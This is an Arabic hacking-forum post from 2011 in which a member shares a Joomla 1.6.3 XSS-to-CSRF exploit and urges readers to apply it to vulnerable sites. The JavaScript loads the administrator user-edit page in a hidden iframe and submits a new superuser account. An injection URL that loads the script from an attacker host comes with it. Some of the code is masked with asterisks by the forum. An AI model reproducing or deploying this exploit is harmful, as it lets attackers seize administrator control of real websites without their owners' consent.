التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 07-06-2011, 08:13 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.Mix
 

 

 
إحصائية العضو







Dr.Mix غير متواجد حالياً

إرسال رسالة عبر MSN إلى Dr.Mix

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.Mix is on a distinguished road

.. آخر ثغرات الجوملة


سلام يا اخوان كيفكم ان شاء الله بالف خير

اليوم جايب لكم اخر الثغرات في الجوملة

كود PHP:
This vulnerability takes advantage of the recent Joomla 1.6.3 XSS vulnerability http://seclists.org/fulldisclosure/2011/Jun/519 ) to execute a CSRF vulnerability to create a superuser account.
***65279;
/*
joom163.js
Joomla 1.6.3 XSS -> CSRF Exploit
Greetz to Shardy, Xires & Stacy, Rage, coorslitedude, Nothingness, MaXe
Coded By: Connection
 
Vuln Link: index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1";'>"><script src=http://attacker.com/joom163.js></script>
 
*/
********.writeln('<****** id="******" src="http://victim.com/administrator/index.php?option=com_users&view=user&layout=edit" width="0" height="0" style="visibility:hidden;" onload="read()"></******>');
 
function 
read()
{
var 
name="Test";
var 
username="haxx";
var 
password="test123";
var 
email="fake _at_ gmail.com";
 
********.
getElementById("******").content********.forms[0].jform_name.value name;
********.
getElementById("******").content********.forms[0].jform_username.value username;
********.
getElementById("******").content********.forms[0].jform_password.value password;
********.
getElementById("******").content********.forms[0].jform_password2.value password;
********.
getElementById("******").content********.forms[0].jform_email.value email;
********.
getElementById("******").content********.forms[0].getElementById("1group_8").checked=true;
********.
getElementById("******").content********.getElementsByTagName("a")[11].onclick(); 
طبق هادا على الموقع المصاب :
index.php?option=com_contact&view=category&catid=2 6&id=36&Itemid=-1

ان شاء الله تكون شغالة

اخوكم الهكر المحشش(Haboubamix) :lol:


Nov eyvhj hg[,lgm

التوقيع

قريبا افتتاح دورة الافتر افكتس من طرف DR.MIX

http://img11.hostingpics.net/pics/36...sDisk00054.jpg

تابعونا

 

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 05:33 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0